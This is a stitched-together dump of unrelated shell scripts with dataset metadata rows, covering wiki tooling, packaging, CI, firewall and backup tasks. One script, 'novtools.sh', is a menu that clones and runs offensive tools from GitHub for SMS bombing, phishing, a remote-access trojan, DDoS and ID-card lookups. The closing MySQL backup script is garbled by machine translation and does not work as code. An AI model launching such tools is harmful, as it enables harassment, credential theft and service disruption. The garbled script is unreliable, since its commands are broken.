fzf --ansi
fi
}
function search_filename {
local DIRECTORY
local NAME
local DATE
DIRECTORY=$1
DATE=$(date -I)
if ! NAME=$(\
find "$DIRECTORY" -type f -name "*.md" -printf '%P\n' | \
sed 's/\.md$//' | \
grep -v "^diary/${DATE}$" | \
sort |
sed "1 idiary/$DATE" | \
sed '$a<NEW>' | \
run_fzf "${@:2}" \
); then
exit 1
fi
if [[ "$NAME" == '<NEW>' ]]; then
echo $(new)
return 0
fi
echo "${NAME}.md"
}
function search_searchindex {
local FOUND
local TYPE
local TARGET
local WIDTH
local SOURCE
FOUND=""
if [ "$#" -gt 1 ]; then
FOUND=$(fzf --ansi -q "${@:2}" < "$1/.pernote-index")
else
FOUND=$(fzf --ansi < "$1/.pernote-index")
fi
if [ ${#FOUND} -eq 0 ]; then
echo ""
return
fi
TYPE=$(echo "$FOUND" | sed 's/:.*//' | sed 's/ *$//')
TARGET=$(echo "$FOUND" | sed 's/.*:: *//' | sed 's/ *$//')
SOURCE=$(echo "$FOUND" | sed 's/^[a-z_]\+ *:\+ *//' | sed 's/:.*//' | sed 's/ *$//')
if [ "$TYPE" == "head" ] || [ "$TYPE" == "bad_link" ]; then
echo "${SOURCE}.md"
return
fi
WIDTH=$(tput cols)
WIDTH=$((WIDTH-10))
SELECTION=$(whiptail --title "Which do you want to open?" --notags --fb --menu --nocancel "Open source or target?" 15 "$WIDTH" 3 "s" "Source: $SOURCE" "t" "Target: $TARGET" 3>&1 1>&2 2>&3)
FOUND="${SOURCE}.md"
if [ "$SELECTION" == 't' ]; then
FOUND="$TARGET"
fi
echo "$FOUND"
}
function search_content {
local OUT
# --color=always --line-number
if ! OUT="$(cd "$1" && rg --no-line-number --column --no-heading --type markdown . | sed 's/^\([^:]\+\)\.md:1:/\1: /' | run_fzf "${@:2}")"; then
exit 1
fi
echo "${OUT//\:*/}.md"
}
function run_git {
cd "$1"
git "${@:2}"
}
function action_match {
local -n CONFIG="$1"
local INPUT="$2"
local -n RESULT=$3
MATCH_COUNT=1
while [ $MATCH_COUNT -gt 0 ]; do
MATCH_COUNT=0
for ACT in "${CONFIG[@]}"; do
RE="^$ACT\-?(.*)"
if [[ "$INPUT" =~ $RE ]]; then
MATCH_COUNT=$(( MATCH_COUNT + 1 ))
RESULT+=("$ACT")
INPUT="${BASH_REMATCH[1]}"
fi
RE="^${ACT:0:1}\-?(.*)"
if [[ "$INPUT" =~ $RE ]]; then
MATCH_COUNT=$(( MATCH_COUNT + 1 ))
RESULT+=("$ACT")
INPUT="${BASH_REMATCH[1]}"
fi
done
done
}
function execute_find {
local ACTION=$1
local WIKI="$2"
if ! RET="$("search_$ACTION" "$WIKI" "${@:3}")"; then
echo "Could not get document"
exit 1
fi
echo "$RET"
}
if [ $# -lt 2 ]; then
show_help
exit 1
fi
# shellcheck disable=SC2034 # Not Unused - BASH pass by name
ACTION_CONFIG=("new" "filename" "date" "content" "buildindex" "searchindex"
"git" "remotesync" "help" "installdeps")
declare -a ACTIONS
action_match ACTION_CONFIG "$2" ACTIONS
if [ ${#ACTIONS[@]} -eq 0 ]; then
exit 1
fi
WIKI=$(get_wiki_path "$1");
for ACTION in "${ACTIONS[@]}"; do
if [ "$ACTION" == "help" ]; then
show_help
continue
fi
if [ "$ACTION" == "git" ]; then
run_git "$WIKI" "${@:3}"
continue
fi
if [ "$ACTION" == "installdeps" ]; then
if ! OPTS="$(which pernote-index)"; then
npm install -g pernote-index
fi
continue
fi
if [ "$ACTION" == "buildindex" ]; then
pernote-index -r "$WIKI" > "${WIKI}/.pernote-index"
continue
fi
if [ "$ACTION" == "remotesync" ]; then
echo git -C "$WIKI" add .
git -C "$WIKI" add .
echo git -C "$WIKI" commit -m 'commit'
git -C "$WIKI" commit -m 'commit' || true
echo git -C "$WIKI" pull
git -C "$WIKI" pull --no-edit || true
echo git -C "$WIKI" push
git -C "$WIKI" push || true
continue
fi
FOUND=""
if [ "$ACTION" == "date" ] || [ "$ACTION" == "searchindex" ] || [ "$ACTION" == "filename" ] || [ "$ACTION" == "content" ]; then
if ! FOUND=$(execute_find "$ACTION" "$WIKI" "${@:3}"); then
echo "Could not get document"
exit 1
fi
fi
if [ "$ACTION" == "new" ]; then
FOUND=$(new)
fi
if [ ${#FOUND} -eq 0 ]; then
echo "Was expecting a document name but found nothing"
exit 1
fi
WEBSITE_RE='^https?\:\/\/'
if [[ "$FOUND" =~ $WEBSITE_RE ]]; then
xdg-open "$FOUND"
exit 0
fi
mkdir -p "$WIKI/$(dirname "$FOUND")"
cd "${WIKI}"
$EDITOR "${FOUND}"
done
| true
|
57d790a0c0ed5423492fa6870cf1b7bcd730c5b1
|
Shell
|
patrickkeCN/CI-All
|
/ci/setupContainer.sh
|
UTF-8
| 392
| 2.75
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -e
# Add common variables.
echo ">>>> Import common variables."
source ~/ci/commonVar.sh
#Create administrator in Gerrit.
echo ">>>> Setup Gerrit."
source ~/gerrit-docker/addGerritUser.sh
#Integrate Jenkins with Gerrit.
echo ">>>> Setup Jenkins."
source ~/jenkins-docker/setupJenkins.sh
#Restart Nginx proxy.
echo ">>>> Restart Nginx proxy."
docker restart ${NGINX_NAME}
| true
|
76c7f442bdeb9ef04c3f40d74a1764e7f8d74415
|
Shell
|
KXStudio/KXStudio
|
/scripts/old/update-git-deb
|
UTF-8
| 838
| 3.9375
| 4
|
[] |
no_license
|
#!/bin/bash
# Script to automatically update git based debs and rebuild
# Please do the upload yourself, as this may take some time...
export LANG="C"
ALL=`ls`
# Run the action against all folders
for i in $ALL; do
if [ -d $i/.git ]; then
cd $i
# Package version type
DEBIAN=`cat debian/changelog | head -n 1 | awk '{printf$2}' | awk 'sub("\\\(","")' | awk 'sub("lucid","maverick")' | awk 'sub("\\\)","\n")' | head -n 1`
DATE=`date +"20%y%m%d"`
# Check if it has updates
TEST_GIT=`git pull`
if [ "$TEST_GIT" != "Already up-to-date." ]; then
echo "New Git Available!!"
echo "RUNNING AUTO-SCRIPT NOW!"
VERSION="$DEBIAN""$DATE""-0~ppa1"
dch -v $VERSION "New Git (scripted)"
debuild -S -sa
else
echo "New Git NOT available..."
fi
cd ..
fi
done
| true
|
aef1c82c62a0221e8939bb1d28f40505f4100c9b
|
Shell
|
ongmark/LibreSignage
|
/build/scripts/fancyread.sh
|
UTF-8
| 706
| 4.59375
| 5
|
[
"BSD-3-Clause",
"CC-BY-4.0",
"OFL-1.1",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/sh
#
# Read user input from STDIN. If the user input is empty,
# echo a default value. An arbitary number of allowed values
# can also be specified.
#
# $1 = Prompt string. The default value is added to this.
# $2 = Default value.
#
# All remaining arguments are considered allowed values.
#
fancyread() {
prompt="$1"
default="$2"
tmp=""
ret=""
shift 2
if [ -n "$1" ]; then
tmp=" ($(echo "$@" | sed 's: :/:g'))"
fi
read -p "$prompt$tmp [default: $default]: " ret
if [ -z "$ret" ]; then
echo "$default"
elif [ -n "$1" ]; then
case "$@" in
*"$ret"*)
echo "$ret"
;;
*)
echo "[Error] Expected one of: $@" > /dev/stderr
exit 1
;;
esac
fi
echo "$ret"
}
| true
|
81a2b3d94305fe1dae35f906309a7f272646e9c8
|
Shell
|
kruger/config
|
/bin/session_make
|
UTF-8
| 2,270
| 3.859375
| 4
|
[] |
no_license
|
#!/bin/bash
#------------------------------------------------------------------
# Script: make_session Author: Scott Kruger
# Usage: make_session usernames
# Description:
# This script and the associated join_session automate the use
# of the multi-user feature of the screen program. It
# essentially automates the management of the acl and session
# names.
#------------------------------------------------------------------
#------------------------------------------------------------------
# script configuration
# NOTE: hardstatus line modified. See below.
#------------------------------------------------------------------
shell_title="Welcome: " # Useful if screenrc displays shell title
screenrc="$HOME/.screenrc"
# These files must match what's in join_session
tmp_screenrc="/tmp/tmpscreenrc"
tmp_session_name="/tmp/session_name"
#------------------------------------------------------------------
# Check usage
#------------------------------------------------------------------
if [ "$#" -lt 1 ]
then
echo "Usage: $0 usernames"
exit
else
other_users=`echo $@ | tr ' ' ','`
fi
#------------------------------------------------------------------
# Create a temporary screenrc that contains the users default
# screenrc plus the multiuser commands.
#------------------------------------------------------------------
if [ -e $screenrc ]; then
cp $screenrc $tmp_screenrc
elif [ -e $tmp_screenrc ]; then
rm $tmp_screenrc
fi
cat >> $tmp_screenrc << EOS
shelltitle $shell_title
multiuser on
addacl $other_users
hardstatus alwayslastline "%{RY}%16=To exit: 'Control-a d' %50=%{Gb}%70= %M %d %c%="
detach
EOS
#------------------------------------------------------------------
# Start up screen with temporary screenrc. Note that it detaches
#------------------------------------------------------------------
screen -c $tmp_screenrc
#------------------------------------------------------------------
# Save session info in temp file for join_session script to use
#------------------------------------------------------------------
screen -ls > $tmp_session_name
#------------------------------------------------------------------
# Rejoin that session
#------------------------------------------------------------------
screen -r
| true
|
6a51a074bb21d4e1542b1b2898828041dcdb947d
|
Shell
|
scjurgen/pyfeld
|
/pack.sh
|
UTF-8
| 672
| 3
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
versionsetup=`grep "this_version =" setup.py | sed "s/^.*version = ['\"]\([0-9ab.]*\)['\"].*$/\\1/g"`
versionrfcmd=`grep "version =" pyfeld/rfcmd.py | sed "s/^.*version = ['\"]\([0-9ab.]*\)['\"].*$/\\1/g" `
echo rfcmd: ${versionrfcmd}
echo setup.py ${versionsetup}
if [ "$versionrfcmd" != "$versionsetup" ]
then
echo "The version are different, please update them before packing"
sleep 2
vi pyfeld/rfcmd.py +19
vi setup.py +20
exit -1
fi
sudo rm -rf pyfeld.egg-info
sudo rm -rf dist
sudo rm -rf build
python3 setup.py build
python3 setup.py dist
python3 setup.py sdist
#python setup.py bdist_wheel
twine upload dist/*
| true
|
fb36055394d9317e92ac3ede706a5ace17068c72
|
Shell
|
hylcugb/isoplotter
|
/compare_versions.sh
|
UTF-8
| 2,414
| 4.28125
| 4
|
[] |
no_license
|
#!/bin/bash
#
# This script will run both versions of isoplotter and compare their output.
#
# Warning! Version 1 can only process uncompressed FASTA. Also, please only
# use one sequence per FASTA.
#
set -e
#
# Analysis configuration
#
# useful if you just want to run the comparison code.
skip_analysis=false
#
# Input files
#
if [ -z $1 ]; then
# See if we're on Sean's machine.
if [ -e /media/student/poly/genome/fa/chr1.fa ]; then
fastas=$(echo /media/student/poly/genome/fa/chr{{1..22},X,Y}.fa)
else
echo "usage: $(basename $0) fasta_file..."
exit 1
fi
fi
#
# Setup filesystem structure for version1
#
outdir=/tmp/isoplotter-compare
function v1_indir() {
local fasta=$1
echo $outdir/$(basename $fasta)/input
}
function v1_outdir() {
local fasta=$1
echo $outdir/$(basename $fasta)/output
}
function bounds() {
local fasta=$1
local version=$2
echo $outdir/bounds/$(basename $fasta).v$version
}
if ! $skip_analysis; then
#
# Perform analysis
#
rm -rf $outdir
mkdir -p $outdir
mkdir -p $outdir/bounds
for fasta in $fastas; do
mkdir -p $(v1_indir $fasta)
mkdir -p $(v1_outdir $fasta)
ln -s $fasta $(v1_indir $fasta)/
done
# version 1
(
for fasta in $fastas; do
version1/isoplotter pipeline $(v1_indir $fasta) $(v1_outdir $fasta)
cat $(v1_outdir $fasta)/IsoPlotter_ns_H.txt |
awk '{print $2 " " $3 " " $4}' > $(bounds $fasta 1)
done
)
# version 2
(
for fasta in $fastas; do
version2/isoplotter $fasta |
awk '{print $2 " " $3 " " $4}' > $(bounds $fasta 2)
done
)
fi
#
# Compare results
#
total_ndiffs=0
total_nlines=0
function report_diffs() {
local label=$1
local ndiffs=$2
local nlines=$3
echo "$label: Found differences in $ndiffs out of $nlines" $(python -c "print '(%.6f%%)' % (float($ndiffs)/$nlines*100)")
}
for fasta in $fastas; do
bounds1=$(bounds $fasta 1)
bounds2=$(bounds $fasta 2)
ndiffs=$(diff $bounds1 $bounds2 | grep ">" | wc -l)
nlines=$(cat $fasta | wc -l)
if (( $ndiffs != 0 )); then
report_diffs $(basename $fasta) $ndiffs $nlines
fi
total_ndiffs=$((total_ndiffs + ndiffs))
total_nlines=$((total_nlines + nlines))
done
report_diffs "TOTAL" $total_ndiffs $total_nlines
| true
|
c6372628701471a44a97e5c125537d2173a02fc1
|
Shell
|
fabriz/cpp_libs_build_scripts
|
/libs/tinyxml2/tinyxml2-8.0.0/config.sh
|
UTF-8
| 1,190
| 2.984375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#-----------------------------------------------------------------------------------------------------------------------
# Copyright (C) 2021 Fabrizio Maj
#
# This file is part of the cpp_libs_build_scripts project, which is distributed under the MIT license.
# Refer to the licenses of the managed libraries for conditions on their use and distribution.
# For details, see https://github.com/fabriz/cpp_libs_build_scripts
#-----------------------------------------------------------------------------------------------------------------------
# Configuration script for tinyxml2 8.0.0
# Library release date: 2020/03/02
export FM_TINYXML2_NAME="tinyxml2"
export FM_TINYXML2_VERSION="8.0.0"
export FM_TINYXML2_FULL_NAME="${FM_TINYXML2_NAME}-${FM_TINYXML2_VERSION}"
export FM_TINYXML2_TARBALL_NAME="${FM_TINYXML2_FULL_NAME}.tar.gz"
export FM_TINYXML2_TARBALL_DOWNLOAD_URL="https://github.com/leethomason/tinyxml2/tarball/${FM_TINYXML2_VERSION}"
export FM_TINYXML2_UNTAR_DIR="leethomason-tinyxml2-*"
export FM_TINYXML2_INSTALL_CHECK="include/tinyxml2.h"
export FM_TINYXML2_HASH="e1a5a3c88882597fa1976b3fbbe4fe438540f03b44a9e205bfc5834cdb6725fa"
export FM_TINYXML2_HASH_TYPE="SHA-256"
| true
|
44647a6d023df89dba854bf48b21398fe53e8716
|
Shell
|
ttlin1/OsmLoader
|
/bin/db-export.sh
|
UTF-8
| 2,673
| 3.53125
| 4
|
[] |
no_license
|
. ~/OsmLoader/bin/db-common.sh
echo "START > > > > > "
date
# if a command line parameter is passed run the init & hastus builders, if not simple export the
# init and hastus tables to shapefile and csv
if [ $1 ]
then
echo "****** REFRESH and RELOAD THE INIT / HASTUS DATA in POSTGIS ******"
. ~/OsmLoader/bin/db-inithastus.sh
else
echo
echo "****** IMPORTANT: USING THE EXISTING INIT / HASTUS DATA and JUST EXPORTING THE .shp FILES!!!! *******"
echo
fi
# config
PGBIN=${PGBIN:="/home/geoserve/postgres/bin"}
PGSQL2SHP=${PGSQL2SHP:="$PGBIN/pgsql2shp"}
PSQL=${PSQL:="$PGBIN/psql"}
INIT_DIR=${INIT_DIR:="/home/otp/htdocs/init"}
HASTUS_DIR=${HASTUS_DIR:="/home/otp/htdocs/hastus"}
TRAPEZE_DIR=${TRAPEZE_DIR:="/home/otp/htdocs/trapeze"}
# do INIT
#
# Export the four files! (streets.shp, turnrestrictions.csv, citydirectory.shp, and streetdirectory.csv)
# All files should be in projection 4326 and INIT needs column names
# on shapefiles to be all upper case (thus no -k parameter)
echo "export INIT .shp files to $INIT_DIR"
$PGSQL2SHP -u geoserve -f $INIT_DIR/Streets.shp trimet osm.init_streets
$PGSQL2SHP -u geoserve -f $INIT_DIR/StreetDirectory.shp trimet osm.init_street_dir
$PGSQL2SHP -u geoserve -f $INIT_DIR/CityDirectory.shp trimet osm.init_city_dir
# turn.csv
tr_file="$INIT_DIR/TurnRestrictions.csv"
tr_copy_sql="COPY (SELECT * FROM osm.init_turns) TO '$tr_file' CSV;"
echo "$tr_copy_sql"
$PSQL -U geoserve -d trimet -c "$tr_copy_sql"
# zip them up ...
cd $INIT_DIR
rm -f init.zip *~
zip init.zip *.* -x *.html *.log
date_file
cd -
# do HASTUS
#
# pgsql2shp -h maps7 -u tmpublic -P tmpublic -f C:\TEMP\hastus_streets.shp trimet osm.hastus_streets
# hastus_turns as a CSV for their turn restrictions.
# They don.t want the headers or the first column, so something like:
# COPY (SELECT from_segment, fseg_position, to_segment FROM osm.hastus_turns) TO '/home/bh/otp/osm-loader/hastus_turns.csv' CSV;
echo "export HASTUS .shp files to $HASTUS_DIR"
$PGSQL2SHP -k -u geoserve -f $HASTUS_DIR/hastus_transit.shp trimet osm.hastus_transit
# turn .csv
tr_file="$HASTUS_DIR/hastus_turns.csv"
ht_copy_sql="COPY (SELECT from_segment, fseg_position, to_segment FROM osm.hastus_turns) TO '$tr_file' CSV;"
echo "$ht_copy_sql"
$PSQL -U geoserve -d trimet -c "$ht_copy_sql"
# zip them up ...
cd $HASTUS_DIR
rm -f hastus.zip *~
zip hastus.zip *.* -x *.html *.log
date_file
cd -
# do Trapeze
echo "Export TRAPEZE shapefile to $TRAPEZE_DIR"
$PGSQL2SHP -k -u geoserve -f $TRAPEZE_DIR/trapeze_streets.shp trimet osm.trapeze_streets
# zip..
cd $TRAPEZE_DIR
rm -f trapeze.zip *~
zip trapeze.zip *.* -x *.html *.log
date_file
cd -
date
echo "END < < < < < "
| true
|
fa017d1afbaf1dbf39c0972c2810a768133f4301
|
Shell
|
mdpiper/LANDIS
|
/setup
|
UTF-8
| 1,160
| 3.28125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Set up an environment for LANDIS-II on beach.
# Mark Piper (mark.piper@colorado.edu)
# Location of LANDIS-II install.
export LANDIS_DIR=$HOME/LANDIS-II
# Location of custom GDAL with Mono bindings for LANDIS-II.
GDAL_VERSION=1.8.1
# export GDAL_DIR=/usr/local/gdal-$GDAL_VERSION-gcc
export GDAL_DIR=$LANDIS_DIR/GDAL/$GDAL_VERSION
# Location of Mono install.
export MONO_DIR=/usr/local/mono
# Include Mono and custom GDAL in standard paths.
PATH=$MONO_DIR/bin:$GDAL_DIR/bin:$PATH
if [ $MANPATH ]; then
MANPATH=$MONO_DIR/man:$MANPATH
else
MANPATH=$MONO_DIR/man
fi
if [ $LIBRARY_PATH ]; then
LIBRARY_PATH=$MONO_DIR/lib:$GDAL_DIR/lib:$LIBRARY_PATH
else
LIBRARY_PATH=$MONO_DIR/lib:$GDAL_DIR/lib
fi
if [ $CPATH ]; then
CPATH=$MONO_DIR/include:$GDAL_DIR/include:$CPATH
else
CPATH=$MONO_DIR/include:$GDAL_DIR/include
fi
if [ $LD_LIBRARY_PATH ]; then
LD_LIBRARY_PATH=$MONO_DIR/lib:$GDAL_DIR/lib:$LD_LIBRARY_PATH
else
LD_LIBRARY_PATH=$MONO_DIR/lib:$GDAL_DIR/lib
fi
export PATH MANPATH LIBRARY_PATH CPATH LD_LIBRARY_PATH
# Make a convenient alias to call LANDIS-II.
alias landis='mono $LANDIS_DIR/v6/bin/Landis.Console-6.0.exe'
| true
|
fdf38ee9c23466c84874b22ee304c0c66f803505
|
Shell
|
FauxFaux/debian-control
|
/s/shorewall/shorewall_5.2.1.4-1_all/postinst
|
UTF-8
| 2,130
| 3.25
| 3
|
[] |
no_license
|
#!/bin/sh -e
. /usr/share/debconf/confmodule
case "$1" in
configure)
db_reset shorewall/dont_restart || true
db_reset shorewall/major_release || true
db_go
if [ ! -d /var/lib/shorewall ]
then
mkdir -p /var/lib/shorewall
fi
# The init script was moved from shorewall-common to shorewall, but
# the shorewall-common postrm tries to remove the symlinks, which
# cannot happen since /etc/init.d/shorewall now exists in the
# shorewall package.
if [ -f "/var/lib/dpkg/info/shorewall-common.postrm" ]
then
rm -f /var/lib/dpkg/info/shorewall-common.postrm
fi
restart="true"
if [ -f "/etc/default/shorewall" ]
then
. /etc/default/shorewall
fi
if [ "$restart" = "true" ] && [ "$startup" = "1" ]
then
if /sbin/shorewall check
then
if [ -d "/run/systemd/system" ] && [ -f "/lib/systemd/system/shorewall.service" ]
then
deb-systemd-helper enable shorewall.service
deb-systemd-invoke restart shorewall.service
elif [ -f "/etc/init.d/shorewall" ]
then
if [ -x "/usr/sbin/invoke-rc.d" ]
then
invoke-rc.d shorewall restart
else
/etc/init.d/shorewall restart
fi
fi
else
db_input critical shorewall/invalid_config || true
fi
fi
;;
abort-upgrade|abort-remove|abort-deconfigure)
;;
*)
echo "postinst called with unknown argument \`$1'" >&2
exit 0
;;
esac
# Automatically added by dh_installinit/11.5.4
if [ "$1" = "configure" ] || [ "$1" = "abort-upgrade" ] || [ "$1" = "abort-deconfigure" ] || [ "$1" = "abort-remove" ] ; then
if [ -x "/etc/init.d/shorewall" ]; then
update-rc.d shorewall defaults >/dev/null || exit 1
fi
fi
# End automatically added section
| true
|
d913efb69dd114eeaa7e9e606254cef726510122
|
Shell
|
forast3r/dasshio
|
/.travis/build.sh
|
UTF-8
| 578
| 3.453125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -e
set -x
archs="${ARCHS}"
for addon in "$@"; do
if [ -z ${TRAVIS_COMMIT_RANGE} ] || git diff --name-only ${TRAVIS_COMMIT_RANGE} | grep -v README.md | grep -q ${addon}; then
if [ -z "$archs" ]; then
archs=$(jq -r '.arch // ["armhf", "amd64", "aarch64", "i386"] | [.[] | "--" + .] | join(" ")' ${addon}/config.json)
fi
docker run --rm --privileged -v ~/.docker:/root/.docker -v $(pwd)/${addon}:/data homeassistant/amd64-builder ${archs} -t /data --no-cache
else
echo "No change in commit range ${TRAVIS_COMMIT_RANGE}"
fi
done
| true
|
fa3f89e66195b598b6261c7e5c2ab399742cae7f
|
Shell
|
andre-setiawan9/novtools
|
/novtools.sh
|
UTF-8
| 3,598
| 3
| 3
|
[] |
no_license
|
#!bin/bash
#Version 1.1 (Beta)
clear
figlet NOV TOOLS | lolcat
echo "---------------------------------------------------
| # Author : NOV |
| # Email : trianov1506@gmail.com |
| # Instagram : @trianovwidyandaru |
| # Website : www.3anovproduction.wordpress.com |
| # Facebook : www.facebook.com/rianfarhanfaiz |
| # Version : V 1.1 (Beta) |
---------------------------------------------------" | lolcat
sleep 1
echo
echo "Selamat Datang, Nama Anda Siapa?"
read -p "Masukkan Nama Anda : " nama
echo
read -p "Hai $nama, Ingin Lanjut?" enter
sleep 0.3
echo "[#]> Tools Sudah Di Aktifkan" | lolcat
echo "[#]> Exit 00" | lolcat
sleep 1
echo ""
echo -e $b "1. Tools Nmap${enda}";
echo
echo -e $b "2. Tools Tools Project${enda}";
echo
echo -e $b "3. Tools Troll Project${enda}";
echo
echo -e $b "4. Tools SMS Bomb${enda}";
echo
echo -e $b "5. Tools Check CCTV${enda}";
echo
echo -e $b "6. Tools A-Rat${enda}";
echo
echo -e $b "7. Tools OSIF${enda}";
echo
echo -e $b "8. Tools Menampilkan Tombol${enda}";
echo
echo -e $b "9. Tools GPS Tracking${enda}";
echo
echo -e $b "10.Tools IPGeolocation${enda}";
echo
echo -e $b "11.Tools Lazymux${enda}";
echo
echo -e $b "12.Tools ShellPhish${enda}";
echo
echo -e $b "13.Tools Xshell${enda}";
echo
echo -e $b "14.Tools Websploit${enda}";
echo
echo -e $b "15.Tools Hammer (DDOS)${enda}";
echo
echo -e $b "16.Tools KK & KTP${enda}";
echo
echo -e $b "17.Tools Uninnstall Tools${enda}";
echo
read -p "Pilih Nomor : " no
if [ $no = 1 ]
then
pkg install nmap
fi
if [ $no = 2 ]
then
git clone https://github.com/zlucifer/trap_project.git
cd trap_project
chmod +x trap.sh
bash trap.sh
fi
if [ $no = 3 ]
then
git clone https://github.com/zlucifer/troll_project.git
cd troll_project
chmod +X troll.sh
bash troll.sh
fi
if [ $no = 4 ]
then
git clone https://github.com/zlucifer/sms_bomb.git
cd sms_bomb
chmod +x bom.sh
bash bom.sh
fi
if [ $no = 5 ]
then
git clone https://github.com/zlucifer/all_seeing.git
cd all_seeing
chmod +x cctv.sh
bash cctv.sh
fi
if [ $no = 6 ]
then
git clone https://github.com/Xi4u7/A-Rat.git
cd A-Rat
chmod +x A-Rat.py
python2 A-Rat.py
fi
if [ $no = 7 ]
then
git clone https://github.com/CiKu370/OSIF.git
cd OSIF
pip install -r requirements.txt
chmod +x osif.py
python2 osif.py
fi
if [ $no = 8 ]
then
git clone https://github.com/karjok/terkey.git
cd terkey
chmod +x terkey.py
python terkey.py
fi
if [ $no = 9 ]
then
git clone https://github.com/indosecid/gps_tracking.git
cd gps_tracking
chmod +x gps.php
php gps.php
fi
if [ $no = 10 ]
then
git clone https://github.com/maldevel/IPGeolocation.git
cd IPGeolocation
chmod +x ipgeolocation.py
pip install -r requirements.txt
python ipgeolocation.py -m
python ipgeolocation.py -h
python ipgeolocation.py -t
fi
if [ $no = 11 ]
then
git clone https://github.com/Gameye98/Lazymux.git
cd Lazymux
chmod +x lazymux.py
python2 lazymux.py
fi
if [ $no = 12 ]
then
git clone https://github.com/thelinuxchoice/shellphish.git
cd shellphish
chmod +x shellphish.sh
bash shell.sh
fi
if [ $no = 13 ]
then
git clone https://github.com/Ubaii/Xshell.git
cd Xshell
chmod +x xshell.py
python xshell.py
fi
if [ $no = 14 ]
then
git clone https://github.com/websploit/websploit
cd websploit
chmod +x *
pip2 install scapy
python2 websploit
fi
if [ $no = 15 ]
then
git clone https://github.com/cyweb/hammer.git
cd hammer
chmod +x hammer.py
python hammer.py
fi
if [ $no = 16 ]
then
git clone https://github.com/IndonesianSecurity/kkktp.git
cd kkktp
chmod +x kkktp.php
php kkktp.php
fi
if [ $no = 17 ]
then
pkg install mc
fi
| true
|
59f4d11832afc5c6b469375ee505d319af7cae18
|
Shell
|
xlogerais/test-spring-boot
|
/start.bash
|
UTF-8
| 827
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
SESSION_NAME=springboot
BASEDIR="$HOME/Work/Dev/test-spring-boot"
VERSION="0.0.1-SNAPSHOT"
DEBUG="--debug"
# Create tmux session
tmux new-session -s "${SESSION_NAME}" -d
# Start spring infra (eureka, admin-server, config-server)
tmux new-window -t "${SESSION_NAME}" -n "eureka" -c "${BASEDIR}/base" "java -jar eureka/target/eureka-${VERSION}.jar $DEBUG"
tmux new-window -t "${SESSION_NAME}" -n "config-server" -c "${BASEDIR}/base" "java -jar config/target/config-${VERSION}.jar $DEBUG"
tmux new-window -t "${SESSION_NAME}" -n "admin-server" -c "${BASEDIR}/base" "java -jar admin/target/admin-${VERSION}.jar $DEBUG"
sleep 30
# Start applications
tmux new-window -t "${SESSION_NAME}" -n "helloworld" -c "${BASEDIR}/apps" "java -jar helloworld-api/target/helloworld-api-${VERSION}.jar $DEBUG"
| true
|
54390c3d62c16cd77b64c19a7ac86baf26edb832
|
Shell
|
gerdansantos/Admin_Rev3
|
/dockerfiles/ambari_node/ambari_node.sh
|
UTF-8
| 197
| 2.5625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
if [ $# -lt 1 ]
then
echo "Usage: ambari_node.sh <node_name>"
exit
fi
docker run -dns 127.0.0.1 -h $1 -name $1 -p 22 -link node1:node1 -p 8440 -p 8441 -i -t hwx/ambari_node
| true
|
9e86bb82ba68afed627867743f924e34020b1cfc
|
Shell
|
wzpdada/dada
|
/mysql.sh
|
UTF-8
| 3,923
| 3.359375
| 3
|
[] |
no_license
|
设置 -e
USER = “备份”
密码= “备份”
#数据库数据目录#
DATA_DIR = “ / data / mysql ”
BIN_INDEX = $ DATA_DIR “ /mysql-bin.index ”
#备份目录#
BACKUP_DIR = “ / data / backup / mysql ”
BACKUP_LOG = “ /var/log/mysql/backup.log ”
DATE = ` date + “%Y%m%d ” `
TIME = ` date + “%Y%m%d%H ” `
LOG_TIME = ` date + “%Y-%m-%d%H:%M:%S ” `
DELETE_BINLOG_TIME = “ 7天”
INCREMENT_INTERVAL = “ 3小时”
note(){
printf “ [ $ LOG_TIME ]注意:$ * \ n ” >> $ BACKUP_LOG ;
}
警告(){
printf “ [ $ LOG_TIME ]警告:$ * \ n ” >> $ BACKUP_LOG ;
}
error(){
printf “ [ $ LOG_TIME ]错误:$ * \ n ” >> $ BACKUP_LOG ;
1 号出口;
}
full_backup(){
local dbs = ` ls -l $ DATA_DIR | grep “ ^ d ” | awk -F “ ” ' {print $ 9} ' `
for db in $ dbs
做
本地 backup_dir = $ BACKUP_DIR “ / full / ” $ db
本地文件名= $ db “。” $ DATE
local backup_file = $ backup_dir “ / ” $ filename “ .sql ”
如果 [ ! -d $ backup_dir ]
然后
mkdir -p $ backup_dir || {error “创建数据库$ db全量备份目录$ backup_dir失败” ; 继续; }
注意“数据库$ db全量备份目录$ backup_dir 不存在,创建完成” ;
科幻
注意“完全备份$ db start ... ”
mysqldump --user = $ {USER} --password = $ {PASSWORD} --flush-logs --skip-lock-tables --quick $ db > $ backup_file || {warning “数据库$ db备份失败” ; 继续; }
cd $ backup_dir
tar -cPzf $ filename “ .tar.gz ” $ filename “ .sql ”
rm -f $ backup_file
chown -fR mysql:mysql $ backup_dir
注意“数据库$ db备份成功” ;
注意“完全备份$ db end。”
DONE
}
increment_backup(){
local StartTime = ` date “ -d $ INCREMENT_INTERVAL前” + “%Y-%m-%d%H:%M:%S ” `
local DELETE_BINLOG_END_TIME = ` date “ -d $ DELETE_BINLOG_TIME前” + “%Y-%m-%d%H:%M:%S ” `
local dbs = ` ls -l $ DATA_DIR | grep “ ^ d ” | awk -F “ ” ' {print $ 9} ' `
MySQL的-u $ USER -p $ PASSWORD -e “之前, '清除主日志$ DELETE_BINLOG_END_TIME ' ” &&注意“删除$ DELETE_BINLOG_TIME日之前登录” ;
filename = ` cat $ BIN_INDEX | awk -F “ / ” ' {print $ 2} ' `
对于 我 在 $文件名
做
for db in $ dbs
做
本地 backup_dir = $ BACKUP_DIR “ / increment / ” $ db
本地文件名= $ db “。” $ TIME
local backup_file = $ backup_dir “ / ” $ filename “ .sql ”
如果 [ ! -d $ backup_dir ]
然后
mkdir -p $ backup_dir || {error “创建数据库$ db增量备份目录$ backup_dir失败” ; 继续; }
请注意“数据库$ db增量备份目录$ backup_dir 不存在,创建完成” ;
科幻
注意“增量备份$ db表单时间$ StartTime start ... ”
